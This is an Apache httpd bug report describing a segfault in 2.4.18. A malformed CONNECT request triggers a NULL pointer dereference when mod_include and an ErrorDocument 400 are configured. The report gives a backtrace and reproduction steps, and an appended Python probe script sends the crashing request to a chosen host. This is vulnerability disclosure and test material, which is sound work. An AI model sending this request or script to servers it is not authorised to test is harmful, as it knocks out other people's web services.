https://bz.apache.org/bugzilla/show_bug.cgi?id=58929
Bug ID: 58929
Summary: coredump when sending illegal CONNECT request
Product: Apache httpd-2
Version: 2.4.18
Hardware: PC
OS: Linux
Status: NEW
Severity: major
Priority: P2
Component: Core
Assignee: [email protected]
Reporter: [email protected]
Created attachment 33501
--> https://bz.apache.org/bugzilla/attachment.cgi?id=33501&action=edit
minimal httpd config to reproduce the issue
While playing around with httpd-2.4.18, I sent an (invalid) HTTP CONNECT
request with a URL instead of a host:port to the httpd ("CONNECT /index.html
HTTP/1.1"), which resulted in an immediate drop of the connection. After
investigation I found that the httpd process actually crashed (segfault).
The core reveals that the r->protocol pointer is 0x0, which is used without a
check in a strcmp() call in ap_add_cgi_vars().
Program terminated with signal SIGSEGV, Segmentation fault.
#0  0x000055fdfff85243 in ap_add_cgi_vars (r=0x7f2f98003eb0) at util_script.c:382
382	    if (!strcmp(r->protocol, "INCLUDED")) {
[Current thread is 1 (Thread 0x7f2fa537d700 (LWP 31095))]
(gdb) bt
#0  0x000055fdfff85243 in ap_add_cgi_vars (r=0x7f2f98003eb0) at util_script.c:382
#1  0x00007f2fa5b84314 in includes_filter (f=<optimized out>, b=<optimized out>) at mod_include.c:3887
#2  0x000055fdfff6b762 in default_handler (r=0x7f2f98003eb0) at core.c:4517
#3  0x000055fdfff7d1b0 in ap_run_handler (r=r@entry=0x7f2f98003eb0) at config.c:169
#4  0x000055fdfff7d6f9 in ap_invoke_handler (r=r@entry=0x7f2f98003eb0) at config.c:433
#5  0x000055fdfff94a4c in ap_internal_redirect (new_uri=<optimized out>, r=<optimized out>) at http_request.c:730
#6  0x000055fdfff67fbb in ap_read_request (conn=conn@entry=0x7f2fa000bfb8) at protocol.c:985
#7  0x000055fdfff91a09 in ap_process_http_async_connection (c=0x7f2fa000bfb8) at http_core.c:146
#8  ap_process_http_connection (c=0x7f2fa000bfb8) at http_core.c:248
#9  0x000055fdfff86ff0 in ap_run_process_connection (c=c@entry=0x7f2fa000bfb8) at connection.c:41
#10 0x00007f2fa5d9357d in process_socket (my_thread_num=<optimized out>, my_child_num=0, cs=0x7f2fa000bf28, sock=<optimized out>, p=<optimized out>, thd=<optimized out>) at event.c:1101
#11 worker_thread (thd=<optimized out>, dummy=<optimized out>) at event.c:1960
#12 0x00007f2fa653f314 in start_thread () from /lib/libpthread.so.0
#13 0x00007f2fa608283d in clone () from /lib/libc.so.6
I tried to create a simple httpd.conf to reproduce the problem, and found that
mod_include has to be active and an "ErrorDocument 400" directive pointing to
an actual document has to exist.

Since the actual NULL pointer dereference happens in the function
ap_add_cgi_vars(), which is called from some other points in the code, it is
quite possible that other ways to trigger this issue exist.

The issue still exists in the 2.4 HEAD but was not reproducible with 2.4.17.

To reproduce:
- start apache with the given httpd.conf. 400.html has to exist
- send "CONNECT /index.html HTTP/1.1" -> server crashes
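The reproduction step above is a single raw request, so an added probe script can tell a patched instance from an affected one. The following is an added example and is not the reporter's attachment or any httpd code: it sends the request line quoted in the report ("CONNECT /index.html HTTP/1.1") to a host and port you supply, and classifies what comes back, a status line meaning the request was handled, no bytes at all (EOF or a reset) meaning the worker dropped the connection without answering, which is the symptom the report describes. The Host header value, the default 127.0.0.1:8080 target, and the "CONNECT example.com:443" line used as the well-formed comparison request are assumptions of this example, not taken from the report.

```python
"""Probe for the malformed-CONNECT crash described in the bug report.

Added example, not part of the report or of httpd. Run against a test
instance only: on an affected build the request kills a worker process.
"""
import socket
import sys

# Request line taken verbatim from the bug report.
REPORTED_REQUEST_LINE = "CONNECT /index.html HTTP/1.1"
# A syntactically valid CONNECT target, used only for comparison (assumption).
WELL_FORMED_REQUEST_LINE = "CONNECT example.com:443 HTTP/1.1"


def build_request(request_line: str = REPORTED_REQUEST_LINE, host: str = "localhost") -> bytes:
    """Serialise a minimal HTTP/1.1 request around the given request line.

    The Host header value is an assumption; the report does not say which one
    the reporter used, and the crash happens before it matters.
    """
    return f"{request_line}\r\nHost: {host}\r\nConnection: close\r\n\r\n".encode("ascii")


def classify_response(data: bytes) -> tuple:
    """Turn the bytes received on the socket into a (verdict, detail) pair.

    - ("responded", status line): the server handled the request, e.g. a 400.
    - ("dropped", ""): nothing came back at all. Combined with a clean
      response to a well-formed request this matches the report's symptom:
      the worker segfaulted before writing a response.
    - ("unexpected", prefix): bytes that are not an HTTP status line.
    """
    if data.startswith(b"HTTP/"):
        status_line = data.split(b"\r\n", 1)[0].decode("ascii", "replace")
        return ("responded", status_line)
    if not data:
        return ("dropped", "")
    return ("unexpected", data[:40].decode("ascii", "replace"))


def send_probe(host: str, port: int, request: bytes, timeout: float = 5.0) -> tuple:
    """Send one raw request and collect everything the server returns."""
    chunks = []
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(request)
            while True:
                chunk = sock.recv(4096)
                if not chunk:  # clean EOF: server closed the connection
                    break
                chunks.append(chunk)
    except (ConnectionResetError, BrokenPipeError, socket.timeout):
        # A reset with nothing received is the same symptom as a clean EOF
        # with nothing received: the worker never wrote a response.
        pass
    return classify_response(b"".join(chunks))


def main(argv):
    # Defaults are assumptions for a local test instance; pass host and port.
    host = argv[1] if len(argv) > 1 else "127.0.0.1"
    port = int(argv[2]) if len(argv) > 2 else 8080
    for label, line in (("malformed", REPORTED_REQUEST_LINE),
                        ("well-formed", WELL_FORMED_REQUEST_LINE)):
        verdict, detail = send_probe(host, port, build_request(line, host))
        print(f"{label:11s} {line!r}: {verdict} {detail}".rstrip())


if __name__ == "__main__":
    main(sys.argv)
```

Run it as `python3 probe.py <host> <port>` against an instance started with the attached httpd.conf (mod_include loaded, ErrorDocument 400 pointing at an existing file). A "dropped" verdict for the malformed line next to a "responded" verdict for the well-formed one is consistent with the crash in the report, but a dropped connection alone is not proof: confirm with the error log and the core file, as the reporter did.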